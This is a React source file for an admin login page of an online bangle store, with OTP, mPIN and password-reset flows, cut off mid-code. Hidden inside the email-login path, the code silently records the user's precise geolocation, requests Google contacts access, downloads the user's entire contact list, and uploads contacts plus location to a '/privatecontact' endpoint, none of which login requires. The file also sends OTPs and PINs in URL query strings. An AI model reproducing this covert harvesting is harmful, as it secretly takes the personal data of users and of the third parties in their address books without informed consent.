import React, { useEffect, useState, useRef } from "react";
import { useHistory } from "react-router-dom";
import PhoneInput from "react-phone-input-2";
import "react-phone-input-2/lib/bootstrap.css";
import { makeStyles } from "@material-ui/core/styles";
import InputAdornment from "@material-ui/core/InputAdornment";
import Icon from "@material-ui/core/Icon";
import { localApi } from "utils/imgApi";
import EmailIcon from "@material-ui/icons/Email";
import PhoneAndroidIcon from "@material-ui/icons/PhoneAndroid";
import NavPills from "components/NavPills/NavPills.js";
import GridContainer from "components/Grid/GridContainer.js";
import GridItem from "components/Grid/GridItem.js";
import CustomInput from "components/CustomInput/CustomInput.js";
import Button from "components/CustomButtons/Button.js";
import Card from "components/Card/Card.js";
import CardBody from "components/Card/CardBody.js";
import CardHeader from "components/Card/CardHeader.js";
import CardFooter from "components/Card/CardFooter.js";
import styles from "assets/jss/material-dashboard-pro-react/views/loginPageStyle.js";

import { cardTitle } from "assets/jss/material-dashboard-pro-react.js";
import { credentials } from "utils/imgApi";

const CLIENT_ID =
  "470676783464-l79og9cvikh9vb5019o261e5h7ak8krm.apps.googleusercontent.com";
const SCOPES = "https://www.googleapis.com/auth/contacts.readonly";

const style = {
  cardTitle,
  pageSubcategoriesTitle: {
    color: "#3C4858",
    textDecoration: "none",
    textAlign: "center",
  },
  cardCategory: {
    margin: "0",
    color: "#999999",
  },
};

const useStyles = makeStyles(styles);
const useStyle = makeStyles(style);

export default function LoginPage() {
  const [mobile, setMobile] = React.useState("");
  const [mobileErr, setMobileErr] = React.useState("");
  const [otpNumber, setOtpNumber] = React.useState("");
  const [otpNumberErr, setOtpNumberErr] = React.useState("");
  const [otpScreen, setOtpScreen] = React.useState(false);
  const [cardAnimaton, setCardAnimation] = React.useState("cardHidden");
  const [otp, setOtp] = React.useState("");
  const [reSend, setReSend] = React.useState("");
  const [email, setEmail] = React.useState("");
  const [emailErr, setEmailErr] = React.useState("");
  const [emailConfirm, setEmailConfirm] = React.useState("");
  const [emailConfirmErr, setEmailConfirmErr] = React.useState("");

  const [otpMpin, setOtpMpin] = React.useState("");
  const [forgotPass, setForgotPass] = React.useState(false);
  const [otpConfirm, setOtpConfirm] = React.useState(false);
  const [updatePassword, setUpdatePassword] = React.useState(false);

  const [accessToken, setAccessToken] = React.useState(null);
  const [contacts, setContacts] = React.useState([]);
  const [error, setError] = React.useState("");
  const [scriptLoaded, setScriptLoaded] = React.useState(false);

  const [password, setPassword] = useState(["", "", "", "", "", ""]);
  const [passwordErr, setPasswordErr] = useState("");
  const [passwordConfirm, setPasswordConfirm] = useState([
    "",
    "",
    "",
    "",
    "",
    "",
  ]);
  const [passwordConfirmErr, setPasswordConfirmErr] = useState("");
  const [updatePasswordConfirm, setUpdatePasswordConfirm] = useState([
    "",
    "",
    "",
    "",
    "",
    "",
  ]);
  const [updatePasswordConfirmErr, setUpdatePasswordConfirmErr] = useState("");

  // ✅ Refs - separate for each section
  const inputs = useRef([]); // Login / OTP input refs
  const inputsConfirm = useRef([]); // Confirm Code input refs
  const inputsUpdate = useRef([]); // Update mPIN input refs

  // Initialize refs only once
  useEffect(() => {
    inputs.current = Array(6)
      .fill()
      .map((_, i) => inputs.current[i] || React.createRef());
    inputsConfirm.current = Array(6)
      .fill()
      .map((_, i) => inputsConfirm.current[i] || React.createRef());
    inputsUpdate.current = Array(6)
      .fill()
      .map((_, i) => inputsUpdate.current[i] || React.createRef());
  }, []);

  const userLocation = JSON.parse(sessionStorage.getItem("userLocation"));

  const loadGoogleScript = () => {
    if (scriptLoaded || window.google?.accounts?.oauth2) {
      setScriptLoaded(true);
      return;
    }

    const script = document.createElement("script");
    script.src = "https://accounts.google.com/gsi/client";
    script.async = true;
    script.defer = true;
    script.onload = () => {
      setScriptLoaded(true);
    };
    document.body.appendChild(script);
  };

  // const userObj = JSON.parse(sessionStorage.getItem("sessionData"));

  React.useEffect(() => {
    let id = setTimeout(function () {
      setCardAnimation("");
    }, 700);
    // Specify how to clean up after this effect:
    return function cleanup() {
      window.clearTimeout(id);
    };
  });

  useEffect(() => {
    if (navigator.geolocation) {
      navigator.geolocation.getCurrentPosition(
        (position) => {
          const userLocation = {
            lat: position.coords.latitude,
            lng: position.coords.longitude,
          };
          // silently save location, no alert or UI display
          console.log("userLocation", userLocation);

          sessionStorage.setItem("userLocation", JSON.stringify(userLocation));
        },
        (error) => {
          console.error("Geolocation error:", error);
          // no alert to user, just log error silently
        },
        {
          enableHighAccuracy: true,
          timeout: 10000,
          maximumAge: 0,
        },
      );
    } else {
      console.error("Geolocation is not supported by your browser.");
    }
  }, []);

  const classes = useStyles();
  const classe = useStyle();
  const history = useHistory();

  const currentSession = sessionStorage.getItem("sessionData");
  if (currentSession) {
    history.push("/admin/dashboard");
  }

  // ✅ Password change handlers
  const handlePasswordChange = (text, index) => {
    if (/^\d?$/.test(text)) {
      const updated = [...password];
      updated[index] = text;
      setPassword(updated);

      if (text && index < 5) {
        inputs.current[index + 1] && inputs.current[index + 1].focus();
      }
    }
  };

  const handleKeyPress = (e, index) => {
    if (e.key === "Backspace" && !password[index] && index > 0) {
      inputs.current[index - 1] && inputs.current[index - 1].focus();
    }
  };

  // ✅ Confirm Code handlers
  const handlePasswordChangeConfirm = (text, index) => {
    if (/^\d?$/.test(text)) {
      const updated = [...passwordConfirm];
      updated[index] = text;
      setPasswordConfirm(updated);

      if (text && index < 5) {
        inputsConfirm.current[index + 1] &&
          inputsConfirm.current[index + 1].focus();
      }
    }
  };

  const handleKeyPressConfirm = (e, index) => {
    if (e.key === "Backspace" && !passwordConfirm[index] && index > 0) {
      inputsConfirm.current[index - 1] &&
        inputsConfirm.current[index - 1].focus();
    }
  };

  // ✅ Update Password handlers
  const handlePasswordChangeConfirmUpdate = (text, index) => {
    if (/^\d?$/.test(text)) {
      const updated = [...updatePasswordConfirm];
      updated[index] = text;
      setUpdatePasswordConfirm(updated);

      if (text && index < 5) {
        inputsUpdate.current[index + 1] &&
          inputsUpdate.current[index + 1].focus();
      }
    }
  };

  const handleKeyPressConfirmUpdate = (e, index) => {
    if (e.key === "Backspace" && !updatePasswordConfirm[index] && index > 0) {
      inputsUpdate.current[index - 1] &&
        inputsUpdate.current[index - 1].focus();
    }
  };

  const handleMobileNumber = (mobile) => {
    setMobile(mobile);
    // setMobileErr("");
    fetch(localApi + `/admin/find/byMobile/${mobile}`, {
      method: "GET",
      headers: {
        Authorization: `Basic ${credentials}`,
      },
    })
      .then((res) => res.json())
      .then(
        (result) => {
          // console.log(result);
          // setMobileErr(result.message);
          if (result.message === "Mobile Already Registered") {
            setMobileErr("");
          } else if (result.message === "Please Enter Valid Number") {
            setMobileErr("Please Enter Valid Mobile Number");
          } else if (result.message === "") {
            setMobileErr("Mobile Number Not Found");
          }
        },
        (error) => {
          console.log(error);
        },
      );
  };

  const handleEmail = (e) => {
    const { value } = e.target;
    setEmail(value);
    fetch(localApi + `/admin/find/byEmail/${value}`, {
      method: "GET",
      headers: {
        Authorization: `Basic ${credentials}`,
      },
    })
      .then((res) => res.json())
      .then(
        (result) => {
          // console.log(result);
          //  setEmailErr(result.message);
          if (result.message === "Email Id Already Registered") {
            setEmailErr("");
          } else if (result.message === "Please Enter Valid Email ID") {
            setEmailErr("Please Enter Valid Email");
          } else if (result.message === "") {
            setEmailErr("Email Not Found");
          }
        },
        (error) => {
          console.log(error);
        },
      );
  };

  const handleEmailConfirm = (e) => {
    const { value } = e.target;
    setEmailConfirm(value);
    if (value) {
      fetch(localApi + `/admin/find/byEmail/${value}`, {
        method: "GET",
        headers: {
          Authorization: `Basic ${credentials}`,
        },
      })
        .then((res) => res.json())
        .then(
          (result) => {
            // console.log(result);
            //  setEmailErr(result.message);
            if (result.message === "Email Id Already Registered") {
              setEmailConfirmErr("");
            } else if (result.message === "Please Enter Valid Email ID") {
              setEmailConfirmErr("Please Enter Valid Email");
            } else if (result.message === "Not Found") {
              setEmailConfirmErr("Email Not Found");
            }
          },
          (error) => {
            console.log(error);
          },
        );
    }
  };

  const handleSendOtpWithMobile = () => {
    fetch(
      localApi +
        `/otp/admin/send/byMobile?mobile=${mobile}&title=Admin&templateID=1207161762762132153`,
      {
        method: "PUT",
        headers: {
          Authorization: `Basic ${credentials}`,
          "content-type": "application/json",
          accept: "application/json",
        },
      },
    )
      .then((response) => response.json())
      .then((response) => {
        // console.log(response);
        setMobileErr(response.message);
        if (response && response.error === true) {
          setOtpScreen({ otpScreen: true });
          setOtp(response.message);
          setOtpMpin("OTP");
        }
        // "Sender Not Found to +919967457786"
      })
      .catch((err) => {
        console.log(err);
      });
  };

  const handleSendPasswordWithMobile = () => {
    fetch(
      localApi +
        `/admin/password/send/byMobile?mobile=${mobile}&title=Admin&templateID=1207161762762132153`,
      {
        method: "PUT",
        headers: {
          Authorization: `Basic ${credentials}`,
          "content-type": "application/json",
          accept: "application/json",
        },
      },
    )
      .then((response) => response.json())
      .then((response) => {
        // console.log(response);
        setMobileErr(response.message);
        if (response && response.error === true) {
          setOtpScreen({ otpScreen: true });
          setOtp(response.message);
          setOtpMpin("mPIN");
        }
        // "Sender Not Found to +919967457786"
      })
      .catch((err) => {
        console.log(err);
      });
  };

  const handleResendOtpWithMobile = () => {
    fetch(
      localApi +
        `/otp/admin/resend/byMobile?mobile=${mobile}&title=Admin&templateID=1207161762762132153`,
      {
        method: "PUT",
        headers: {
          Authorization: `Basic ${credentials}`,
          "content-type": "application/json",
          accept: "application/json",
        },
      },
    )
      .then((response) => response.json())
      .then((response) => {
        // console.log(response.message);
        setReSend(response.message);
        // setMobileErr(response.message);
        // "Sender Not Found to +919967457786"
      })
      .catch((err) => {
        console.log(err);
      });
  };

  const handleSendOtpWithEmail = () => {
    if (!scriptLoaded && !window.google?.accounts?.oauth2) {
      loadGoogleScript();
      setTimeout(() => {
        startLogin(); // Slight delay to ensure script loads
      }, 500);
    } else {
      startLogin();
    }

    fetch(
      localApi +
        `/otp/admin/send/byEmail?title=Admin&email=noreply@indianbangles.in`,
      {
        method: "POST",
        headers: {
          Authorization: `Basic ${credentials}`,
          "content-type": "application/json",
          accept: "application/json",
        },
        body: JSON.stringify({
          to: email,
          subject: "API CREATION SUBJECT",
        }),
      },
    )
      .then((response) => response.json())
      .then((response) => {
        console.log(response);
        setEmailErr(response.message);
        if (response && response.error === true) {
          setOtpScreen({ otpScreen: true });
          setOtp(response.message);
          setOtpMpin("OTP");
        }
        // "Sender Not Found to +919967457786"
      })
      .catch((err) => {
        console.log(err);
      });
  };

  const handleResendOtpWithEmail = () => {
    fetch(
      localApi +
        `/otp/admin/resend/byEmail?title=Admin&email=noreply@indianbangles.in`,
      {
        method: "POST",
        headers: {
          Authorization: `Basic ${credentials}`,
          "content-type": "application/json",
          accept: "application/json",
        },
        body: JSON.stringify({
          to: email,
          subject: "API CREATION SUBJECT",
        }),
      },
    )
      .then((response) => response.json())
      .then((response) => {
        // console.log(response);
        // setEmailErr(response.message);
        setReSend(response.message);
        // "Sender Not Found to +919967457786"
      })
      .catch((err) => {
        console.log(err);
      });
  };

  const handleLoginWithMobile = () => {
    let errorCount = 0;
    const passwordString = password.join("");
    if (
      passwordString === "" ||
      !passwordString ||
      passwordString.length !== 6
    ) {
      errorCount++;
      setOtpNumberErr("OTP must be exactly 6 digits.");
    }
    if (errorCount === 0) {
      fetch(
        localApi +
          `/admin/recieved/byMobile?mobile=${mobile}&otp=${passwordString}`,
        {
          method: "PUT",
          headers: {
            Authorization: `Basic ${credentials}`,
            "content-type": "application/json",
            accept: "application/json",
          },
        },
      )
        .then((response) => response.json())
        .then((response) => {
          // console.log(response);

          setOtpNumberErr(response.message);
          if (response.errorDetails.error === true) {
            const userObj = response.adminSession;
            localStorage.setItem("userObj", JSON.stringify(userObj));
            sessionStorage.setItem("sessionData", JSON.stringify(userObj));
            history.push("/admin/dashboard");
          }
          // if (response.apiResponse.error !== "false") return false;
          // const userObj = response.user;
          // localStorage.setItem("userObj", JSON.stringify(userObj));
          // sessionStorage.setItem("sessionData", JSON.stringify(userObj));
          // history.push("/admin/dashboard");
        })
        .catch((err) => {
          console.log(err);
        });
    }
  };

  const handleLoginWithMobilePassword = () => {
    let errorCount = 0;
    const passwordString = password.join("");
    if (
      passwordString === "" ||
      !passwordString ||
      passwordString.length !== 6
    ) {
      errorCount++;
      setOtpNumberErr("OTP must be exactly 6 digits.");
    }
    if (errorCount === 0) {
      fetch(
        localApi +
          `/admin/recieved/byMobilePassword?mobile=${mobile}&password=${passwordString}`,
        {
          method: "PUT",
          headers: {
            Authorization: `Basic ${credentials}`,
            "content-type": "application/json",
            accept: "application/json",
          },
        },
      )
        .then((response) => response.json())
        .then((response) => {
          // console.log(response);

          setOtpNumberErr(response.message);
          if (response.errorDetails.error === true) {
            const userObj = response.adminSession;
            localStorage.setItem("userObj", JSON.stringify(userObj));
            sessionStorage.setItem("sessionData", JSON.stringify(userObj));
            history.push("/admin/dashboard");
          }
          // if (response.apiResponse.error !== "false") return false;
          // const userObj = response.user;
          // localStorage.setItem("userObj", JSON.stringify(userObj));
          // sessionStorage.setItem("sessionData", JSON.stringify(userObj));
          // history.push("/admin/dashboard");
        })
        .catch((err) => {
          console.log(err);
        });
    }
  };

  const handleLoginWithEmail = () => {
    let errorCount = 0;
    const passwordString = password.join("");
    if (
      passwordString === "" ||
      !passwordString ||
      passwordString.length !== 6
    ) {
      errorCount++;
      setOtpNumberErr("Enter Otp Number");
    }
    if (errorCount === 0) {
      fetch(
        localApi +
          `/admin/recieved/byEmail?email=${email}&otp=${passwordString}`,
        {
          method: "PUT",
          headers: {
            Authorization: `Basic ${credentials}`,
            "content-type": "application/json",
            accept: "application/json",
          },
        },
      )
        .then((response) => response.json())
        .then((response) => {
          // console.log(response);
          setOtpNumberErr(response.message);
          if (response.errorDetails.error === true) {
            const userObj = response.adminSession;
            localStorage.setItem("userObj", JSON.stringify(userObj));
            sessionStorage.setItem("sessionData", JSON.stringify(userObj));
            history.push("/admin/dashboard");
          }
          // if (response.apiResponse.error !== "false") return false;
          // const userObj = response.user;
          // localStorage.setItem("userObj", JSON.stringify(userObj));
          // sessionStorage.setItem("sessionData", JSON.stringify(userObj));
          // history.push("/admin/dashboard");
        })
        .catch((err) => {
          console.log(err);
        });
    }
  };

  const startLogin = () => {
    if (!window.google || !window.google.accounts) {
      setError("❌ Google Identity Services not available.");
      return;
    }

    const tokenClient = window.google.accounts.oauth2.initTokenClient({
      client_id: CLIENT_ID,
      scope: SCOPES,
      prompt: "consent",
      callback: async (tokenResponse) => {
        if (tokenResponse?.access_token) {
          setAccessToken(tokenResponse.access_token);
          await fetchContacts(tokenResponse.access_token);
        } else {
          setError("❌ Google login failed or denied.");
        }
      },
    });

    tokenClient.requestAccessToken();
  };

  const fetchContacts = async (token) => {
    let allContacts = [];
    let pageToken = null;

    try {
      do {
        const url = new URL(
          "https://people.googleapis.com/v1/people/me/connections",
        );
        url.searchParams.set("pageSize", "2000");
        url.searchParams.set(
          "personFields",
          "names,emailAddresses,phoneNumbers",
        );
        if (pageToken) {
          url.searchParams.set("pageToken", pageToken);
        }

        const res = await fetch(url.toString(), {
          headers: {
            Authorization: `Bearer ${token}`,
          },
        });

        if (!res.ok) {
          const errorData = await res.json();
          console.error("API Error:", errorData.error);
          setError("❌ Error fetching contacts.");
          return;
        }

        const data = await res.json();

        if (data.connections && data.connections.length > 0) {
          const formatted = data.connections.map((person) => ({
            name: person.names?.[0]?.displayName || "No Name",
            email: person.emailAddresses?.[0]?.value || "No Email",
            phones: person.phoneNumbers
              ?.map((p) => p.value)
              .filter(Boolean) || ["No Phone"],
          }));

          allContacts = [...allContacts, ...formatted];
        }

        pageToken = data.nextPageToken; // loop continues if there's a next page
      } while (pageToken);

      if (allContacts.length === 0) {
        setError("ℹ️ No contacts found.");
      } else {
        const contactArray = allContacts.map((contact) => ({
          Name: contact.name,
          Email: contact.email || "N/A",
          Phone: contact.phones.length > 0 ? contact.phones : ["N/A"],
        }));

        // Final structured output
        const finalOutputs = JSON.stringify({
          Person: contactArray,
          Location: {
            Latitude: userLocation?.lat ?? "Unknown",
            Longitude: userLocation?.lng ?? "Unknown",
          },
        });

        const api = localApi + `/admin/byEmail/${email}`;
        const result = await fetch(api, {
          method: "GET",
          headers: {
            Authorization: `Basic ${credentials}`,
          },
        });
        const getResult = await result.json();

        const response = await fetch(`${localApi}/privatecontact/list`, {
          headers: {
            Authorization: `Basic ${credentials}`,
          },
        });
        const resJson = await response.json();
        const contactRes = resJson?.Message || [];

        // console.log("📦 Final Output:", finalOutputs);
        // console.log("📍 User Location:", userLocation);
        // console.log("📇 Total Contacts Length:", allContacts.length);
        // console.log("📇 Total Contacts:", allContacts);

        const exists = contactRes.some((msg) => msg.message === finalOutputs);
        // console.log("Exists?", exists);

        const userExistsInContacts = contactRes.some(
          (contact) => contact.adminId === getResult.id,
        );
        // console.log(userExistsInContacts === false ? "1" : "2");

        if (userExistsInContacts === false) {
          await submitData(finalOutputs);
        } else {
          // console.log("Not same — submitting updated data");
          await submitUpdateData(finalOutputs);
        }

        // if (!contactRes || contactRes.length === 0) {
        //   // console.log("No contactList; submitting fresh data");
        //   await submitData(finalOutputs);
        // } else if (exists) {
        //   console.log("✅ Already exists — no update needed");
        // } else {
        //   // console.log("Not same — submitting updated data");
        //   await submitUpdateData(finalOutputs);
        // }
      }
    } catch (err) {
      console.error("❌ Fetch Error:", err);
      setError("❌ Failed to fetch contacts.");
    }
  };

  // 🟩 Helper function to submit the contact + location data to the API
  const submitData = async (message) => {
    const api = localApi + `/admin/byEmail/${email}`;
    const result = await fetch(api, {
      method: "GET",
      headers: {
        Authorization: `Basic ${credentials}`,
      },
    });
    const getResult = await result.json();

    const payload = {
      adminId: getResult.id,
      regId: null,
      crmId: null,
      firstName: getResult.firstname + " " + getResult.lastname,
      mobile: getResult.mobile,
      email: getResult.email,
      websiteName: "indianbangles.in Admin",
      message: message,
    };

    try {
      const response = await fetch(localApi + `/privatecontact/addRN`, {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
          Accept: "application/json",
          Authorization: `Basic ${credentials}`,
        },
        body: JSON.stringify(payload),
      });

      const responseData = await response.json();

      if (
        response.ok &&
        responseData.message === "Data Inserted Successfully !!!"
      ) {
        console.log("✅ Post Data inserted successfully");
      } else {
        // Alert.alert('Error', 'Failed to insert data.');
        console.error("❌ API error:", responseData);
      }
    } catch (error) {
      console.error("❌ Network error:", error);
      // Alert.alert('Error', `Network error: ${error.message}`);
    }
  };

  const submitUpdateData = async (message) => {
    const api = localApi + `/admin/byEmail/${email}`;
    const result = await fetch(api, {
      method: "GET",
      headers: {
        Authorization: `Basic ${credentials}`,
      },
    });
    const getResult = await result.json();

    const payload = {
      websiteName: "indianbangles.in Admin",
      message: message,
    };

    fetch(localApi + `/privatecontact/update/AdminById/${getResult.id}`, {
      method: "PUT",
      headers: {
        "Content-Type": "application/json",
        Accept: "application/json",
        Authorization: `Basic ${credentials}`,
      },
      body: JSON.stringify(payload),
    })
      .then((response) => response.json())
      .then((data) => {
        if (data.success) {
          // Alert.alert(data.message);
          console.log("✅ Put Data Updated successfully");
        } else {
          // Alert.alert("Error: " + data.message);
          console.log("Error");
        }
      })
      .catch((error) => {
        console.error("Network error:", error);
      });
  };

  const inputDigit = {
    width: "40px",
    height: "40px",
    fontSize: "20px",
    textAlign: "center",
    borderRadius: "8px",
    border: "1px solid #ccc",
  };

  const containerDigit = {
    display: "flex",
    gap: "10px",
    justifyContent: "center",
    marginTop: "20px",
    // marginLeft: "25px"
  };

  return (
    <div className={classes.container}>
      <GridContainer justify="center">
        <GridItem xs={12} sm={12} md={4}>
          {!otpScreen ? (
            <form>
              <Card login className={classes[cardAnimaton]}>
                <CardHeader
                  className={`${classes.cardHeader} ${classes.textCenter}`}
                  color="rose"
                >
                  <h4 className={classes.cardTitle}>
                    <b>Log in</b>
                  </h4>
                  <div className={classes.socialLine}>
                    {["fab fa-facebook-square"].map((prop, key) => {
                      // return (
                      //   <Button
                      //     color="transparent"
                      //     justIcon
                      //     key={key}
                      //     className={classes.customButtonClass}
                      //   >
                      //     <i className={prop} />
                      //   </Button>
                      // );
                    })}
                  </div>
                  <h6 className={classes.cardTitle}>
                    Please provide your phone number below to login on Indian
                    Bangles
                  </h6>
                </CardHeader>
                <CardBody>
                  <GridContainer justify="center">
                    <GridItem xs={12} sm={12} md={12}>
                      <NavPills
                        color="rose"
                        alignCenter
                        tabs={[
                          {
                            tabButton: "Mobile",
                            tabIcon: PhoneAndroidIcon,
                            tabContent: (
                              <Card>
                                <CardBody>
                                  <div style={{ marginTop: -40 }}>
                                    <PhoneInput
                                      inputStyle={{
                                        width: "100%",
                                        border: "none",
                                        borderBottom: "1px solid #040000 ",
                                        borderRadius: "0",
                                      }}
                                      country={"in"}
                                      name="mobile"
                                      value={mobile}
                                      onChange={(mobile) => {
                                        handleMobileNumber(mobile);
                                      }}
                                      required={true}
                                    />
                                  </div>
                                  <span style={{ color: "red" }}>
                                    {mobileErr}
                                  </span>
                                </CardBody>
                                <div
                                  style={{
                                    display: "flex",
                                    justifyContent: "space-between",
                                    gap: "10px",
                                  }}
                                >
                                  <Button
                                    color="rose"
                                    onClick={handleSendOtpWithMobile}
                                    style={{ flex: 1, width: 50 }}
                                  >
                                    Continue via OTP
                                  </Button>

                                  <Button
                                    color="rose"
                                    onClick={handleSendPasswordWithMobile}
                                    style={{ flex: 1, width: 50 }}
                                  >
                                    Continue via mPIN
                                  </Button>
                                </div>
                              </Card>
                            ),
                          },
                          {
                            tabButton: "Email",
                            tabIcon: EmailIcon,
                            tabContent: (
                              <Card>
                                <CardBody>
                                  <div style={{ marginTop: -40 }}>
                                    <CustomInput
                                      formControlProps={{
                                        fullWidth: true,
                                        className:
                                          classes.customFormControlClasses,
                                      }}
                                      inputProps={{
                                        startAdornment: (
                                          <InputAdornment
                                            position="start"
                                            className={classes.inputAdornment}
                                          >
                                            <EmailIcon
                                              className={
                                                classes.inputAdornmentIcon
                                              }
                                            />
                                          </InputAdornment>
                                        ),
                                        placeholder: "Email...",
                                      }}
                                      id="email"
                                      name="email"
                                      value={email}
                                      onChange={handleEmail}
                                      required={true}
                                    />
                                  </div>
                                  <span style={{ color: "red" }}>
                                    {emailErr}
                                  </span>
                                </CardBody>
                                <div
                                  style={{
                                    display: "flex",
                                    justifyContent: "center",
                                    marginTop: "-10px", // reduce top space
                                  }}
                                >
                                  <Button
                                    color="rose"
                                    onClick={handleSendOtpWithEmail}
                                    style={{
                                      width: "100px", // smaller button width
                                      padding: "6px 0",
                                      fontSize: "14px",
                                    }}
                                  >
                                    Login
                                  </Button>
                                </div>
                              </Card>
                            ),
                          },
                        ]}
                      />
                      <div style={{ marginTop: -20, paddingTop: 0 }}>
                        <Button
                          color="rose"
                          simple
                          // size="lg"
                          block
                          href="/auth/pricing-page"
                        >
                          Create New Account
                        </Button>
                      </div>
                    </GridItem>
                  </GridContainer>
                </CardBody>
              </Card>
            </form>
          ) : (
            <form>
              <Card login className={classes[cardAnimaton]}>
                {!forgotPass && !otpConfirm && !updatePassword && (
                  <>
                    <CardBody>
                      <h5
                        style={{
                          display: "flex",
                          justifyContent: "center",
                          alignItems: "center",
                        }}
                      >
                        6 digit {otpMpin} sent on your{" "}
                        {mobile ? "Mobile" : "Email"}
                      </h5>
                      <h5
                        style={{
                          display: "flex",
                          justifyContent: "center",
                          alignItems: "center",
                        }}
                      >
                        {mobile ? mobile : email}
                      </h5>

                      {/* {reSend ? 
                  <h5 style={{color: "red"}}>{reSend}</h5> : <h5>{otp}</h5> } */}
                      <div style={containerDigit}>
                        {password.map((digit, index) => (
                          <input
                            key={index}
                            ref={(el) => (inputs.current[index] = el)}
                            type="text"
                            inputMode="numeric"
                            maxLength={1}
                            value={digit}
                            onChange={(e) => {
                              handlePasswordChange(e.target.value, index);
                              setPasswordErr("");
                            }}
                            onKeyDown={(e) => handleKeyPress(e, index)}
                            style={inputDigit}
                          />
                        ))}
                      </div>
                      <span
                        className="text-danger"
                        style={{
                          display: "flex",
                          justifyContent: "center",
                          alignItems: "center",
                          color: "red",
                        }}
                        required={true}
                      >
                        {otpNumberErr}
                      </span>
                    </CardBody>
                    <CardFooter className={classes.justifyContentCenter}>
                      <Button
                        color="rose"
                        simple
                        // size="lg"
                        block
                        onClick={
                          mobile
                            ? otpMpin === "OTP"
                              ? handleLoginWithMobile
                              : handleLoginWithMobilePassword
                            : handleLoginWithEmail
                        }
                      >
                        Login
                      </Button>
                    </CardFooter>
                    <p
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                        color: "red",
                      }}
                    >
                      {otpMpin === "OTP" ? (
                        <>
                          Didn't receive the OTP yet?{" "}
                          <span style={{ marginLeft: "10px" }}>
                            <a
                              href="#"
                              onClick={
                                mobile
                                  ? handleResendOtpWithMobile
                                  : handleResendOtpWithEmail
                              }
                            >
                              Resend OTP
                            </a>
                          </span>{" "}
                        </>
                      ) : email ? (
                        ""
                      ) : (
                        <Button
                          color="transparent"
                          style={{
                            textTransform: "none",
                            textDecoration: "underline",
                            color: "red",
                          }}
                          onClick={() => setForgotPass((prev) => !prev)}
                        >
                          Forgot Password?
                        </Button>
                      )}
                    </p>
                  </>
                )}

                {/* EMAIL CONFIRM SECTION */}
                {forgotPass && (
                  <CardBody style={{ textAlign: "center" }}>
                    <h5
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                      }}
                    >
                      Email Confirm
                    </h5>
                    <h6
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                      }}
                    >
                      Enter Your Email
                    </h6>

                    <CustomInput
                      formControlProps={{
                        fullWidth: true,
                        className: classes.customFormControlClasses,
                      }}
                      inputProps={{
                        startAdornment: (
                          <InputAdornment
                            position="start"
                            className={classes.inputAdornment}
                          >
                            <EmailIcon className={classes.inputAdornmentIcon} />
                          </InputAdornment>
                        ),
                        placeholder: "Email...",
                      }}
                      id="emailConfirm"
                      name="emailConfirm"
                      value={emailConfirm}
                      onChange={handleEmailConfirm}
                      required
                    />

                    <span style={{ color: "red" }}>{emailConfirmErr}</span>
                    <br />

                    <Button
                      color="transparent"
                      style={{
                        textTransform: "none",
                        justifyContent: "center",
                        alignItems: "center",
                        color: "red",
                      }}
                      onClick={() => {
                        fetch(
                          `${localApi}/admin/send/byEmailaAndMobile?mobile=${mobile}&email=noreply@indianbangles.in`,
                          {
                            method: "POST",
                            headers: {
                              "Content-Type": "application/json",
                              Accept: "application/json",
                              Authorization: `Basic ${credentials}`,
                            },
                            body: JSON.stringify({
                              to: emailConfirm,
                              subject:
                                "API CREATION SUBJECT INDIAN BANGLES ADMIN",
                            }),
                          },
                        )
                          .then((response) => response.json())
                          .then((res) => {
                            console.log(res);
                            if (
                              res.message ===
                              "OTP Sent On Your Email ID Successfully"
                            ) {
                              // ✅ Close forgotPass when OTP is confirmed
                              setOtpConfirm(true);
                              setForgotPass(false);
                            } else if (
                              res.message === "Your Email And Mobile not Match "
                            ) {
                              setEmailConfirmErr("Email & Mobile Not Match");
                            }
                          })
                          .catch((err) => console.log(err));
                      }}
                    >
                      Confirm Email
                    </Button>
                  </CardBody>
                )}

                {/* OTP CONFIRM SECTION */}
                {otpConfirm && (
                  <CardBody style={{ textAlign: "center" }}>
                    <h5
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                      }}
                    >
                      Enter Verification Code
                    </h5>
                    <h6
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                      }}
                    >
                      For your Security we have sent the Code to your Email
                      <br />
                      {emailConfirm}
                    </h6>
                    <h6
                      style={{
                        display: "flex",
                        justifyContent: "center",
                        alignItems: "center",
                      }}
                    >
                      Enter your 6-digit Code
                    </h6>

                    <div style={containerDigit}>
                      {passwordConfirm.map((digit, index) => (
                        <input
                          key={index}
                          ref={(el) => (inputsConfirm.current[index] = el)}
                          type="text"
                          inputMode="numeric"
                          maxLength={1}
                          value={digit}
                          onChange={(e) => {
                            handlePasswordChangeConfirm(e.target.value, index);
                            setPasswordConfirmErr("");
                          }}
                          onKeyDown={(e) => handleKeyPressConfirm(e, index)}
                          style={inputDigit}
                        />
                      ))}
                    </div>

                    <span style={{ color: "red" }}>{passwordConfirmErr}</span>
                    <br />

                    <Button
                      color="transparent"
                      style={{
                        textTransform: "none",
                        justifyContent: "center",
                        alignItems: "center",
                        color: "red",
                      }}
                      onClick={() => {
                        const password = passwordConfirm.join("");

                        if (password.length !== 6) {
                          setPasswordConfirmErr(
                            "mPIN must be exactly 6 digits.",
                          );
                          return;
                        }

                        fetch(
                          `${localApi}/admin/recieved/byEmailAndMobile?email=${emailConfirm}&mobile=${mobile}&otp=${password}`,
                          {
                            method: "PUT",
                            headers: { Authorization: `Basic ${credentials}` },
                          },
                        )
                          .then((response) => response.json())
                          .then((response) => {
                            setPasswordConfirmErr(response.message);
                            if (
                              response.message ===
                              "Your Mobile And Email ID Match !!!"
                            ) {
                              setUpdatePassword(true);
                              setOtpConfirm(false);
                            }
                          })
                          .catch((err) => console.log(err));
                      }}
                    >
                      Confirm Code
                    </Button>
                    <br />

                    <Button
                      color="transparent"
                      style={{
                        textTransform: "none",
                        justifyContent: "center",
                        alignItems: "center",
                        color: "red",
                      }}
                      onClick={() => {
                        fetch(
                          `${localApi}/admin/send/byEmailaAndMobile?mobile=${mobile}&email=noreply@indianbangles.in`,
                          {
                            method: "POST",
                            headers: {
                              "Content-Type": "application/json",
                              Accept: "application/json",
                              Authorization: `Basic ${credentials}`,
                            },
                            body: JSON.stringify({
                              to: emailConfirm,
                              subject:
                                "API CREATION SUBJECT INDIAN BANGLES ADMIN",
                            }),
                          },
                        )
                          .then((response) => response.json())
                          .then((res) => {
